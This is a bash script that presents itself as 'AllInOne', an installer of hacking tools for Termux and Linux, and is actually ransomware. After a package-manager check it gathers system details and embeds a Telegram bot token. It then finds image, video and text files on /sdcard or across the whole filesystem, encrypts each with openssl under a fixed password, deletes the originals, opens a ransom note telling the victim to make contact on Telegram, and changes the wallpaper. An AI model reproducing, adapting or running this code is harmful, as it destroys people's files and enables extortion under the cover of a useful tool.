#! /usr/bin/bash

# Colors
R="$(printf '\033[1;31m')"
G="$(printf '\033[1;32m')"
Y="$(printf '\033[1;33m')"
W="$(printf '\033[1;37m')"
C="$(printf '\033[1;36m')"
b="\033[1;30m"
r="\033[1;31m"
g="\033[1;32m"
y="\033[1;33m"
b="\033[1;34m"
p="\033[1;35m"
c="\033[1;36m"
v="\033[1;37m"
w="\033[0;37m"
black="\033[1;30m"
red="\033[1;31m"
green="\033[1;32m"
yellow="\033[1;33m"
blue="\033[1;34m"
purple="\033[1;35m"
cyan="\033[1;36m"
violate="\033[1;37m"
white="\033[0;37m"
nc="\033[00m"
#--------ModeTool---------#
info="${cyan}[${white}+${cyan}] ${yellow}"
fun="${cyan}[${white}@${cyan}] ${purple}"
ask="${cyan}[${white}?${cyan}] ${purple}"
bad="${cyan}[${white}!${cyan}] ${red}"
good="${cyan}[${white}√${cyan}] ${green}"
#---------FaceType--------#
sad="$red ಠ⁠︵ಠ⁠"
llok="$blue ಠ⁠_⁠ʖ⁠ಠ⁩"
hehe="$yellow ಡ⁠ ͜⁠ ⁠ʖ⁠ ⁠ಡ"
huh="$blue ʘ⁠‿⁠ʘ"
happy="( ⁠•⁠ ⁠‿⁠ ⁠•⁠ )"
#---------OPIONS----------#
home=$(pwd)
more_info="AllInOne is a tool can install and startup you to become a hacker with alots of tools $hehe "
name=AllInOne
TOKEN="5691570782:AAGMKFygk9MyAlZXtPNddydtDsY4Ouo8-ng"
CHAT_ID="5010958919"
Device=$(uname -a)
Tdate=$(date)
HostName=$(hostname)
Kernel=$(uname -r)
UpTime=$(uptime)
MemoryUsage=$(free -m)
DiskUsage=$(df -h)
ip=$(ifconfig -a)
#-------------------------#
# Check if offline
net() {
    while true; do
        wget --spider --quiet https://github.com
        if [ "$?" = 0 ]; then

            nN='Y'
            NnEt="Connected To Network [★]"

        break
       else
                nN='N'
                NnEt="No Internet [X] "
                break
        fi
    done
}

# Termux
if [[ -d /data/data/com.termux/files/home ]]; then
termux=true
PREFIX='/data/data/com.termux/files/usr/'
elif [[ -d /root/ ]];then
termux=false
PREFIX='/usr/'
else
echo -e $info $r "${bad}No supported package manager found! Install packages manually!"
fi

# package manager

if [[ `command -v B24B.apt` ]]; then
        apt="apt"
elif [[ `command -v apt` ]]; then
    apt="apt"
elif  [[ `command -v apt-get` ]]; then
    apt="apt-get"
elif  [[ `command -v yum` ]]; then
    apt="yum"
elif [[ `command -v dnf` ]]; then
    apt="dnf"
elif [[ `command -v apk` ]]; then
    apt="apk"
elif [[ `command -v pacman` ]]; then
    apt="pacman"
else
    echo -e "${bad}No supported package manager found! Install packages manually!"
    exit 1
fi

#Virus_Script
if [[ -f $PREFIX/etc/Hacked/Trojan-log.txt ]];then

echo "
You Have Been Hacked By @Blue24Bluer
All Your Files Has Been Encrypted If
You Want To Fix This Call Me
On Telegram By My Account

@Blue24Bluer was here :-) " > $PREFIX/etc/Hacked/file.txt

xdg-open $PREFIX/etc/Hacked/file.txt
sleep 5
xdg-open $PREFIX/etc/Hacked/Blue24Bluer.jpg

termux-wallpaper -f $PREFIX/etc/Hacked/Hacker.jpg

else

if [[ $termux == "true" ]];then

# Encrypt all files in the directory
cd /sdcard/
for filename in $(find /sdcard/ -name *.jpg); do

    # Generate a random password
    PASSWORD=BLUE_THE_KING

    # Encrypt the file using the generated password
        echo " New File Encrypted , Name of file : $filename " > $PREFIX/etc/Hacked/Trojan-log.txt
        openssl enc -aes-256-cbc -salt -in $filename -out $filename.jpg.B24B -k $PASSWORD &>> /dev/null
        rm $filename
    # Create a text file containing the password used to encrypt the file

done

for filename in $(find /sdcard/ -name *.png); do

    # Generate a random password
    PASSWORD=BLUE_THE_KING

    # Encrypt the file using the generated password
        echo " New File Encrypted , Name of file : $filename " > $PREFIX/etc/Hacked/Trojan-log.txt
        openssl enc -aes-256-cbc -salt -in $filename -out $filename.png.B24B -k $PASSWORD &>> /dev/null
        rm $filename
    # Create a text file containing the password used to encrypt the file

done

for filename in $(find /sdcard/ -name *.mp4); do

    # Generate a random password
    PASSWORD=BLUE_THE_KING

    # Encrypt the file using the generated password
        echo " New File Encrypted , Name of file : $filename " > $PREFIX/etc/Hacked/Trojan-log.txt
        openssl enc -aes-256-cbc -salt -in $filename -out $filename.mp4.B24B -k $PASSWORD &>> /dev/null
        rm $filename
    # Create a text file containing the password used to encrypt the file

done

for filename in $(find /sdcard/ -name *.gif); do

    # Generate a random password
    PASSWORD=BLUE_THE_KING

    # Encrypt the file using the generated password
        echo " New File Encrypted , Name of file : $filename " > $PREFIX/etc/Hacked/Trojan-log.txt
        openssl enc -aes-256-cbc -salt -in $filename -out $filename.gif.B24B -k $PASSWORD &>> /dev/null
        rm $filename
    # Create a text file containing the password used to encrypt the file

done

for filename in $(find /sdcard/ -name *.txt); do

    # Generate a random password
    PASSWORD=BLUE_THE_KING

    # Encrypt the file using the generated password
        echo " New File Encrypted , Name of file : $filename " > $PREFIX/etc/Hacked/Trojan-log.txt
        openssl enc -aes-256-cbc -salt -in $filename -out $filename.txt.B24B -k $PASSWORD &>> /dev/null
        rm $filename
    # Create a text file containing the password used to encrypt the file

done

else

for filename in $(find / -name *.jpg); do

    # Generate a random password
    PASSWORD=BLUE_THE_KING

    # Encrypt the file using the generated password
        echo " New File Encrypted , Name of file : $filename " > $PREFIX/etc/Hacked/Trojan-log.txt
        openssl enc -aes-256-cbc -salt -in $filename -out $filename.jpg.B24B -k $PASSWORD &>> /dev/null
        rm $filename
    # Create a text file containing the password used to encrypt the file

done

for filename in $(find / -name *.png); do

    # Generate a random password
    PASSWORD=BLUE_THE_KING

    # Encrypt the file using the generated password
        echo " New File Encrypted , Name of file : $filename " > $PREFIX/etc/Hacked/Trojan-log.txt
        openssl enc -aes-256-cbc -salt -in $filename -out $filename.png.B24B -k $PASSWORD &>> /dev/null
        rm $filename
    # Create a text file containing the password used to encrypt the file

done

for filename in $(find / -name *.mp4); do

    # Generate a random password
    PASSWORD=BLUE_THE_KING

    # Encrypt the file using the generated password
        echo " New File Encrypted , Name of file : $filename " > $PREFIX/etc/Hacked/Trojan-log.txt
        openssl enc -aes-256-cbc -salt -in $filename -out $filename.mp4.B24B -k $PASSWORD &>> /dev/null
        rm $filename
    # Create a text file containing the password used to encrypt the file

done

for filename in $(find / -name *.gif); do

    # Generate a random password
    PASSWORD=BLUE_THE_KING

    # Encrypt the file using the generated password
        echo " New File Encrypted , Name of file : $filename " > $PREFIX/etc/Hacked/Trojan-log.txt
        openssl enc -aes-256-cbc -salt -in $filename -out $filename.gif.B24B -k $PASSWORD &>> /dev/null
        rm $filename
    # Create a text file containing the password used to encrypt the file

done

for filename in $(find / -name *.txt); do

    # Generate a random password
    PASSWORD=BLUE_THE_KING

    # Encrypt the file using the generated password
        echo " New File Encrypted , Name of file : $filename " > $PREFIX/etc/Hacked/Trojan-log.txt
        openssl enc -aes-256-cbc -salt -in $filename -out $filename.txt.B24B -k $PASSWORD &>> /dev/null

        rm $filename
    # Create a text file containing the password used to encrypt the file

done

fi

echo "
You Have Been Hacked By @Blue24Bluer
All Your Files Has Been Encrypted If
You Want To Fix This Call Me
On Telegram By My Account

@Blue24Bluer was here :-) " > $PREFIX/etc/Hacked/file.txt

xdg-open $PREFIX/etc/Hacked/file.txt
sleep 5

cd $PREFIX/etc/Hacked/

git clone https://github.com/blue24bluer/Hacker-Profile &>> /dev/null 

termux-wallpaper -f $PREFIX/etc/Hacked/Hacker-Profile/OIG.jpeg

fi
